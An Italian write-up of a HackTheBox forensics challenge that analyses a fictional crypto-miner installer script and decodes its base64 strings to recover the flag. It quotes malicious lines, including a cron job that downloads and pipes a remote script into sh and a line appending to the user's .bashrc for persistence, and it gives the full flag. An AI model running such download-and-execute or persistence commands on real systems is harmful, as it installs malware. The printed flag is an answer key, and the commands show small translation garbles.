Descrizione
Nella corsa per Vitalium su Marte, il malvagio Consiglio di Arodor ricorse a misure disperate, avendo bisogno di fondi per i loro tentativi minerari. Hanno ideato una botnet creata appositamente per estrarre segretamente la criptovaluta. Ci siamo imbattuti in un campione del programma di installazione del minatore di Arodor sul nostro server. Riconoscendo la gravità della situazione, abbiamo avviato un’indagine approfondita. Con te come leader, devi svelare il funzionamento interno del meccanismo di installazione. La scoperta servì da punto di svolta, rivelando la portata della disperazione di Arodor. Tuttavia, la battaglia per Vitalium è continuata, spingendoci a rimanere vigili e ad adattare le nostre difese informatiche per contrastare le minacce future.
Ottieni le note sul certificato OSCP
Il corso pratico completo sul Penetration Testing delle applicazioni Web
La sfida mostra uno script bash molto lungo che contiene alcune stringhe con codifica base64 come quelle seguenti
url locale=”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”
dest=$(echo “X3QwX200cnN9Cg==”|base64 -d)
echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
Tutto quello che dobbiamo fare è decodificare in base64 quelle stringhe e raccogliere le parti che compongono il flag finale.
$ eco cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d
$ echo “X3QwX200cnN9Cg=="|base64 -d
$ echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d
$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d
Bandiera finale
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}
Playlist video dettagliate di HackTheBox